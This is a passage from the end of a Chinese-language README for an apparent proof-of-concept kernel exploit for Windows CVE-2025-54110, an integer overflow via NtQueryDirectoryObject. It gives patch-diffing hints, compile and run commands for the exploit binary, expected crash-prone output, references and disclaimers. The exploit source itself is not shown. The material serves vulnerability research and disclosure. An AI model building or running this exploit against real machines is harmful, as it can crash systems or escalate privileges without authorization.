- "Integer", "Overflow", "Wrap"
```
**步骤 3:交叉引用分析**
```
Functions called by NtQueryDirectoryObject:
ObQueryNameString
ObpEnumerateDirectory
[Related helper functions]
```
**步骤 4:变化幅度**
```
Prioritize functions with:
- Length difference > 100 bytes
- Confidence score 2.0-3.5 (moderate changes)
```
## 构建和运行
### 前置条件
```
- Windows 10/11 (x64)
- Visual Studio 2019+ or MinGW-w64
- Administrator privileges (for syscall access)
```
### 编译
```
# 在 x64 Native Tools CLI for VS 20xx 上
# 使用 Visual Studio
cl.exe /Fe:poc64.exe precise_overflow_bsod.c ntdll.lib
# 或
cl poc.c /link /SUBSYSTEM:CONSOLE
```
```
# 使用 MinGW
gcc precise_overflow_bsod.c -o poc64.exe -lntdll
```
### 执行
```
# 以管理员权限运行
.\poc64.exe
```
**预期输出:**
```
[+] Current user: DESKTOP-XXXXXXX\user
[+] Current PID: 1234
[!] THIS EXPLOIT HAS HIGH CHANCE OF CAUSING BSOD!
[!] Continue? (y/n): y
[!] PRECISION OVERFLOW: threshold=0xFFFFFDBC, status=0xC0000005
[+] System is still running - protections may be active.
```
## 资源与参考
### 官方来源
- [Microsoft 安全公告 - CVE-2025-54110](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54110)
- [CWE-190:整数溢出或环绕](https://cwe.mitre.org/data/definitions/190.html)
- [Windows 内核内部机制 - Microsoft 文档](https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/)
### 研究工具
- [Ghidra - NSA 软件逆向工程套件](https://ghidra-sre.org/)
- [WinDbg - Windows 调试工具](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/)
### 相关阅读
- [内核漏洞利用开发](https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/)
- [Windows 内核漏洞利用](https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)
- [使用 Ghidra 进行补丁比对](https://www.youtube.com/watch?v=K83T7iVla5s)
## 法律免责声明
此代码仅出于教育目的提供。
请勿将此代码用于:
• 未经授权访问计算机系统
• 恶意攻击或破坏
• 任何非法活动
作者对滥用行为不承担任何责任。
用户必须遵守所有适用法律。
**使用此代码即表示您承认:**
1. 您已获得在目标系统上进行测试的授权
2. 您了解您所在司法管辖区的法律含义
3. 您对您的行为承担全部责任
4. 这是为了学习,而不是为了恶意活动
## 法律免责声明
本仓库严格仅限于在受控实验室环境中用于教育、防御性安全研究和漏洞重现目的。
信息和概念验证代码旨在帮助防御者、研究人员和供应商理解并修复已报告的漏洞。
未经明确许可,针对系统未经授权或恶意使用此代码可能违反适用的法律法规。
作者不鼓励或纵容非法活动,并且对因滥用此材料造成的损坏不承担任何责任。
此漏洞披露报告旨在用于:
1. 安全研究和教育
2. 供应商通知和补丁开发
3. 保护最终用户
4. 学术和防御性安全目的
**禁止的用途:**
- 未经授权访问计算机系统
- 恶意利用
- 任何非法活动
研究人员在受控环境中对其个人拥有的系统进行了所有测试。未对第三方系统进行任何未经授权的访问。
**报告版本:** 1.0
**最后更新:** 2026 年 2 月 9 日
## 联系方式
如有正当的安全研究查询或教育合作:
**负责任的披露:**
- 关于此 PoC 的安全问题 → 提出 GitHub Issue
- 真正的 CVE-2025-54110 漏洞利用 → 报告给 [MSRC](https://msrc.microsoft.com/)
## 许可证
```
MIT License - See LICENSE file for details
Educational software provided "as is" without warranty.
Use at your own risk.
```
标签:0day挖掘, 0day漏洞, CISA项目, CVE-2025-54110, EoP, Exploit Development, Ghidra, NtQueryDirectoryObject, PoC, SEH, Web报告查看器, Windows内核漏洞, 二进制差异分析, 云资产清单, 内存损坏, 内核安全, 协议分析, 客户端加密, 整数溢出, 暴力破解, 权限提升, 沙箱逃逸, 漏洞分析, 漏洞复现, 结构化异常处理, 补丁分析, 路径探测, 逆向工程